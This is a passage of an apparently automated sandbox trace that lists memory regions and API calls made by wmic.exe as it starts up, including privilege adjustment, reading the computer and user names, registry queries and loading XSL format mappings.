"" Region: id = 973 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 974 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 975 start_va = 0xda0000 end_va = 0xdaffff entry_point = 0xda0000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmic.exe.mui") Region: id = 976 start_va = 0x58b0000 end_va = 0x5a30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000058b0000" filename = "" Region: id = 977 start_va = 0x5aa0000 end_va = 0x5aaffff entry_point = 0x0 region_type = private name = "private_0x0000000005aa0000" filename = "" Region: id = 978 start_va = 0x60b0000 end_va = 0x74affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000060b0000" filename = "" Region: id = 979 start_va = 0xfb0000 end_va = 0xfb0fff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 980 start_va = 0xfc0000 end_va = 0xfc0fff entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 981 start_va = 0x741c0000 end_va = 0x743e3fff entry_point = 0x741c0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 982 start_va = 0x77430000 end_va = 0x77519fff entry_point = 0x77430000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 983 start_va = 0x74bc0000 end_va = 0x74c34fff entry_point = 0x74bc0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 984 start_va = 0x5ab0000 end_va = 0x5c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000005ab0000" filename = "" Region: id = 985 start_va = 0x5ca0000 end_va = 0x5caffff entry_point = 0x0 region_type = private name = "private_0x0000000005ca0000" filename = "" Region: id = 986 start_va = 0xfd0000 end_va = 0xfd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fd0000" filename = "" Region: id = 987 start_va = 0x1070000 end_va = 0x1127fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001070000" filename = "" Region: id = 988 start_va = 0xfd0000 end_va = 0xfd3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fd0000" filename = "" Region: id = 989 start_va = 0x74ba0000 end_va = 0x74bbcfff entry_point = 0x74ba0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 990 start_va = 0x5ab0000 end_va = 0x5baffff entry_point = 0x0 region_type = private name = "private_0x0000000005ab0000" filename = "" Region: id = 991 start_va = 0x5c80000 end_va = 0x5c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000005c80000" filename = "" Region: id = 992 start_va = 0x74aa0000 end_va = 0x74ab2fff entry_point = 0x74aa0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 993 start_va = 0x74a70000 end_va = 0x74a9efff entry_point = 0x74a70000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 994 start_va = 0xfe0000 end_va = 0x101ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 995 start_va = 0x1020000 end_va = 0x105ffff entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 996 start_va = 0x1140000 end_va = 0x117ffff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 997 start_va = 0x1290000 end_va = 0x12cffff entry_point = 0x0 region_type = private name = "private_0x0000000001290000" filename = "" Region: id = 998 start_va = 0x5840000 end_va = 0x587ffff entry_point = 0x0 region_type = private name = "private_0x0000000005840000" filename = "" Region: id = 999 start_va = 0x5a40000 end_va = 0x5a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000005a40000" filename = "" Region: id = 1000 start_va = 0x7f5fa000 end_va = 0x7f5fcfff entry_point = 0x0 region_type = private name = "private_0x000000007f5fa000" filename = "" Region: id = 1001 start_va = 0x7f5fd000 end_va = 0x7f5fffff entry_point = 0x0 region_type = private name = "private_0x000000007f5fd000" filename = "" Region: id = 1002 start_va = 0x7f724000 end_va = 0x7f726fff entry_point = 0x0 region_type = private name = "private_0x000000007f724000" filename = "" Region: id = 1003 start_va = 0x741a0000 end_va = 0x741b0fff entry_point = 0x741a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 1383 start_va = 0x740e0000 end_va = 0x7419bfff entry_point = 0x740e0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 1384 start_va = 0x1180000 end_va = 0x1194fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 1385 start_va = 0x12d0000 end_va = 0x12f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012d0000" filename = "" Thread: id = 46 os_tid = 0x9cc [0096.354] GetModuleHandleA (lpModuleName=0x0) returned 0x1300000 [0096.354] __set_app_type (_Type=0x1) [0096.354] __p__fmode () returned 0x77ac4d6c [0096.354] __p__commode () returned 0x77ac5b1c [0096.354] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x133aa90) returned 0x0 [0096.354] __wgetmainargs (in: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0, _DoWildCard=0, _StartInfo=0x13491bc | out: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0) returned 0 [0096.356] ??0CHString@@QAE@XZ () returned 0x13495ec [0096.358] ??0CHString@@QAE@XZ () returned 0x13498fc [0096.358] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0096.358] SetConsoleCtrlHandler (HandlerRoutine=0x1334980, Add=1) returned 1 [0096.358] _onexit (_Func=0x1340a20) returned 0x1340a20 [0096.358] _onexit (_Func=0x1340a30) returned 0x1340a30 [0096.358] _onexit (_Func=0x1340a50) returned 0x1340a50 [0096.359] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0096.359] ResolveDelayLoadedAPI () returned 0x770fcd50 [0096.359] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0096.361] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0096.365] CoCreateInstance (in: rclsid=0x1306a1c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a2c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1349510 | out: ppv=0x1349510*=0xdb6aa8) returned 0x0 [0096.747] GetCurrentProcess () returned 0xffffffff [0096.747] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xccfcfc | out: TokenHandle=0xccfcfc*=0x158) returned 1 [0096.747] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xccfcf8 | out: TokenInformation=0x0, ReturnLength=0xccfcf8) returned 0 [0096.747] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x11a3a08, TokenInformationLength=0x118, ReturnLength=0xccfcf8 | out: TokenInformation=0x11a3a08, ReturnLength=0xccfcf8) returned 1 [0096.747] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0x11a3a08*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0096.747] CloseHandle (hObject=0x158) returned 1 [0096.747] SetThreadUILanguage (LangId=0x0) returned 0x409 [0096.750] _vsnwprintf (in: _Buffer=0x11a3a98, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xccfc84 | out: _Buffer="ms_409") returned 6 [0096.750] GetComputerNameW (in: lpBuffer=0x11a3ae0, nSize=0xccfce8 | out: lpBuffer="LHNIWSJ", nSize=0xccfce8) returned 1 [0096.750] lstrlenW (lpString="LHNIWSJ") returned 7 [0096.750] lstrlenW (lpString="LHNIWSJ") returned 7 [0096.750] ResolveDelayLoadedAPI () returned 0x74d5c5f0 [0096.750] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xccfcfc | out: lpNameBuffer=0x0, nSize=0xccfcfc) returned 0x0 [0096.751] GetLastError () returned 0xea [0096.751] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x11a3b20, nSize=0xccfcfc | out: lpNameBuffer="LHNIWSJ\\CIiHmnxMn6Ps", nSize=0xccfcfc) returned 0x1 [0096.751] lstrlenW (lpString="") returned 0 [0096.751] lstrlenW (lpString="LHNIWSJ") returned 7 [0096.751] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0096.752] lstrlenW (lpString=".") returned 1 [0096.752] lstrlenW (lpString="LHNIWSJ") returned 7 [0096.752] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2=".", cchCount2=1) returned 3 [0096.752] lstrlenW (lpString="LOCALHOST") returned 9 [0096.752] lstrlenW (lpString="LHNIWSJ") returned 7 [0096.752] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LOCALHOST", cchCount2=9) returned 1 [0096.752] lstrlenW (lpString="LHNIWSJ") returned 7 [0096.752] lstrlenW (lpString="LHNIWSJ") returned 7 [0096.752] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LHNIWSJ", cchCount2=7) returned 2 [0096.752] lstrlenW (lpString="LHNIWSJ") returned 7 [0096.752] lstrlenW (lpString="LHNIWSJ") returned 7 [0096.752] lstrlenW (lpString="LHNIWSJ") returned 7 [0096.753] lstrlenW (lpString="LHNIWSJ") returned 7 [0096.753] ResolveDelayLoadedAPI () returned 0x77bb9840 [0097.433] SysStringLen (param_1="IDENTIFY") returned 0x8 [0097.433] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0097.433] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0097.433] SysStringLen (param_1="IDENTIFY") returned 0x8 [0097.433] SysStringLen (param_1="IMPERSONATE") returned 0xb [0097.433] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0097.433] SysStringLen (param_1="IMPERSONATE") returned 0xb [0097.433] SysStringLen (param_1="IDENTIFY") returned 0x8 [0097.433] SysStringLen (param_1="IDENTIFY") returned 0x8 [0097.433] SysStringLen (param_1="IMPERSONATE") returned 0xb [0097.433] SysStringLen (param_1="DELEGATE") returned 0x8 [0097.433] SysStringLen (param_1="IDENTIFY") returned 0x8 [0097.433] SysStringLen (param_1="DELEGATE") returned 0x8 [0097.433] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0097.433] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0097.433] SysStringLen (param_1="DELEGATE") returned 0x8 [0097.433] SysStringLen (param_1="NONE") returned 0x4 [0097.433] SysStringLen (param_1="DEFAULT") returned 0x7 [0097.433] SysStringLen (param_1="DEFAULT") returned 0x7 [0097.433] SysStringLen (param_1="NONE") returned 0x4 [0097.434] SysStringLen (param_1="CONNECT") returned 0x7 [0097.434] SysStringLen (param_1="DEFAULT") returned 0x7 [0097.434] SysStringLen (param_1="CALL") returned 0x4 [0097.434] SysStringLen (param_1="DEFAULT") returned 0x7 [0097.434] SysStringLen (param_1="CALL") returned 0x4 [0097.434] SysStringLen (param_1="CONNECT") returned 0x7 [0097.434] SysStringLen (param_1="PKT") returned 0x3 [0097.434] SysStringLen (param_1="DEFAULT") returned 0x7 [0097.434] SysStringLen (param_1="PKT") returned 0x3 [0097.434] SysStringLen (param_1="NONE") returned 0x4 [0097.434] SysStringLen (param_1="NONE") returned 0x4 [0097.434] SysStringLen (param_1="PKT") returned 0x3 [0097.434] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0097.434] SysStringLen (param_1="DEFAULT") returned 0x7 [0097.434] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0097.434] SysStringLen (param_1="NONE") returned 0x4 [0097.434] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0097.434] SysStringLen (param_1="PKT") returned 0x3 [0097.434] SysStringLen (param_1="PKT") returned 0x3 [0097.434] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0097.434] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0097.434] SysStringLen (param_1="DEFAULT") returned 0x7 [0097.434] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0097.434] SysStringLen (param_1="PKT") returned 0x3 [0097.434] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0097.434] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0097.434] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0097.434] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0097.435] GetSystemDirectoryW (in: lpBuffer=0x11a29d8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0097.435] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0097.435] SysStringLen (param_1="\\wbem\\") returned 0x6 [0097.435] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0097.435] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0097.435] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0097.435] GetCurrentThreadId () returned 0x9cc [0097.435] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xccf80c | out: phkResult=0xccf80c*=0x164) returned 0x0 [0097.435] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xccf818, lpcbData=0xccf814*=0x400 | out: lpType=0x0, lpData=0xccf818*=0x30, lpcbData=0xccf814*=0x4) returned 0x0 [0097.435] _wcsicmp (_String1="0", _String2="1") returned -1 [0097.435] _wcsicmp (_String1="0", _String2="2") returned -2 [0097.435] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xccf814*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xccf814*=0x42) returned 0x0 [0097.435] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x11a2be0, lpcbData=0xccf814*=0x42 | out: lpType=0x0, lpData=0x11a2be0*=0x25, lpcbData=0xccf814*=0x42) returned 0x0 [0097.435] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0097.435] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0097.435] RegQueryValueExW (in: hKey=0x164, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xccf818, lpcbData=0xccf814*=0x400 | out: lpType=0x0, lpData=0xccf818*=0x36, lpcbData=0xccf814*=0xc) returned 0x0 [0097.435] _wtol (_String="65536") returned 65536 [0097.436] RegCloseKey (hKey=0x0) returned 0x6 [0097.436] CoCreateInstance (in: rclsid=0x1306a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xccfcac | out: ppv=0xccfcac*=0x58a45a8) returned 0x0 [0097.660] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x58a45a8, xmlSource=0xccfc2c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0xccfc90 | out: isSuccessful=0xccfc90*=0xffff) returned 0x0 [0099.305] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x58a45a8, DOMElement=0xccfca4 | out: DOMElement=0xccfca4) returned 0x0 [0099.337] SysStringLen (param_1="VALUE") returned 0x5 [0099.337] SysStringLen (param_1="TABLE") returned 0x5 [0099.337] SysStringLen (param_1="TABLE") returned 0x5 [0099.337] SysStringLen (param_1="VALUE") returned 0x5 [0099.337] SysStringLen (param_1="LIST") returned 0x4 [0099.337] SysStringLen (param_1="TABLE") returned 0x5 [0099.338] SysStringLen (param_1="RAWXML") returned 0x6 [0099.338] SysStringLen (param_1="TABLE") returned 0x5 [0099.338] SysStringLen (param_1="RAWXML") returned 0x6 [0099.338] SysStringLen (param_1="LIST") returned 0x4 [0099.338] SysStringLen (param_1="LIST") returned 0x4 [0099.338] SysStringLen (param_1="RAWXML") returned 0x6 [0099.338] SysStringLen (param_1="HTABLE") returned 0x6 [0099.338] SysStringLen (param_1="TABLE") returned 0x5 [0099.338] SysStringLen (param_1="HTABLE") returned 0x6 [0099.338] SysStringLen (param_1="LIST") returned 0x4 [0099.339] SysStringLen (param_1="HFORM") returned 0x5 [0099.339] SysStringLen (param_1="TABLE") returned 0x5 [0099.339] SysStringLen (param_1="HFORM") returned 0x5 [0099.339] SysStringLen (param_1="LIST") returned 0x4 [0099.339] SysStringLen (param_1="HFORM") returned 0x5 [0099.339] SysStringLen (param_1="HTABLE") returned 0x6 [0099.339] SysStringLen (param_1="XML") returned 0x3 [0099.339] SysStringLen (param_1="TABLE") returned 0x5 [0099.339] SysStringLen (param_1="XML") returned 0x3 [0099.339] SysStringLen (param_1="VALUE") returned 0x5 [0099.339] SysStringLen (param_1="VALUE") returned 0x5 [0099.339] SysStringLen (param_1="XML") returned 0x3 [0099.340] SysStringLen (param_1="MOF") returned 0x3 [0099.340] SysStringLen (param_1="TABLE") returned 0x5 [0099.340] SysStringLen (param_1="MOF") returned 0x3 [0099.340] SysStringLen (param_1="LIST") returned 0x4 [0099.340] SysStringLen (param_1="MOF") returned 0x3 [0099.340] SysStringLen (param_1="RAWXML") returned 0x6 [0099.340] SysStringLen (param_1="LIST") returned 0x4 [0099.340] SysStringLen (param_1="MOF") returned 0x3 [0099.340] SysStringLen (param_1="CSV") returned 0x3 [0099.340] SysStringLen (param_1="TABLE") returned 0x5 [0099.340] SysStringLen (param_1="CSV") returned 0x3 [0099.340] SysStringLen (param_1="LIST") returned 0x4 [0099.340] SysStringLen (param_1="CSV") returned 0x3 [0099.340] SysStringLen (param_1="HTABLE") returned 0x6 [0099.340] SysStringLen (param_1="CSV") returned 0x3 [0099.340] SysStringLen (param_1="HFORM") returned 0x5 [0099.341] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0099.341] SysStringLen (param_1="TABLE") returned 0x5 [0099.341] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0099.341] SysStringLen (param_1="VALUE") returned 0x5 [0099.341] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0099.341] SysStringLen (param_1="XML") returned 0x3 [0099.341] SysStringLen (param_1="XML") returned 0x3 [0099.341] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0099.341] SysStringLen (param_1="texttablewsys") returned 0xd [0099.341] SysStringLen (param_1="TABLE") returned 0x5 [0099.341] SysStringLen (param_1="texttablewsys") returned 0xd [0099.341] SysStringLen (param_1="XML") returned 0x3 [0099.341] SysStringLen (param_1="texttablewsys") returned 0xd [0099.341] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0099.341] SysStringLen (param_1="XML") returned 0x3 [0099.341] SysStringLen (param_1="texttablewsys") returned 0xd [0099.342] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0099.342] SysStringLen (param_1="TABLE") returned 0x5 [0099.342] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0099.342] SysStringLen (param_1="XML") returned 0x3 [0099.342] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0099.342] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0099.342] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0099.342] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0099.344] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0099.344] SysStringLen (param_1="TABLE") returned 0x5 [0099.344] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0099.344] SysStringLen (param_1="XML") returned 0x3 [0099.344] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0099.344] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0099.344] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0099.344] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0099.344] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0099.344] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0099.344] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0099.345] SysStringLen (param_1="TABLE") returned 0x5 [0099.345] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0099.345] SysStringLen (param_1="XML") returned 0x3 [0099.345] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0099.345] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0099.345] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0099.345] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0099.345] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0099.345] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0099.345] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0099.345] SysStringLen (param_1="TABLE") returned 0x5 [0099.345] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0099.345] SysStringLen (param_1="XML") returned 0x3 [0099.345] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0099.345] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0099.345] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0099.345] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0099.345] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0099.345] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0099.345] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0099.345] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0099.346] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0099.346] SysStringLen (param_1="TABLE") returned 0x5 [0099.346] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0099.346] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0099.346] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0099.346] SysStringLen (param_1="XML") returned 0x3 [0099.346] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0099.346] SysStringLen (param_1="texttablewsys") returned 0xd [0099.346] SysStringLen (param_1="XML") returned 0x3 [0099.346] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0099.346] SysStringLen (param_1="htable-sortby") returned 0xd [0099.346] SysStringLen (param_1="TABLE") returned 0x5 [0099.346] SysStringLen (param_1="htable-sortby") returned 0xd [0099.346] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0099.346] SysStringLen (param_1="htable-sortby") returned 0xd [0099.346] SysStringLen (param_1="XML") returned 0x3 [0099.346] SysStringLen (param_1="htable-sortby") returned 0xd [0099.346] SysStringLen (param_1="texttablewsys") returned 0xd [0099.346] SysStringLen (param_1="htable-sortby") returned 0xd [0099.346] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0099.346] SysStringLen (param_1="XML") returned 0x3 [0099.346] SysStringLen (param_1="htable-sortby") returned 0xd [0099.347] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0099.347] SysStringLen (param_1="TABLE") returned 0x5 [0099.347] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0099.347] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0099.347] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0099.347] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0099.347] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0099.347] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0099.347] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0099.347] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0099.347] SysStringLen (param_1="wmiclimofformat") returned 0xf [0099.347] SysStringLen (param_1="TABLE") returned 0x5 [0099.347] SysStringLen (param_1="wmiclimofformat") returned 0xf [0099.347] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0099.347] SysStringLen (param_1="wmiclimofformat") returned 0xf [0099.347] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0099.347] SysStringLen (param_1="wmiclimofformat") returned 0xf [0099.347] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0099.347] SysStringLen (param_1="wmiclimofformat") returned 0xf [0099.347] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0099.347] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0099.347] SysStringLen (param_1="wmiclimofformat") returned 0xf [0099.348] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0099.348] SysStringLen (param_1="TABLE") returned 0x5 [0099.348] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0099.348] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0099.348] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0099.348] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0099.348] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0099.348] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0099.348] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0099.348] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0099.348] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0099.348] SysStringLen (param_1="TABLE") returned 0x5 [0099.348] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0099.348] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0099.348] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0099.348] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0099.348] 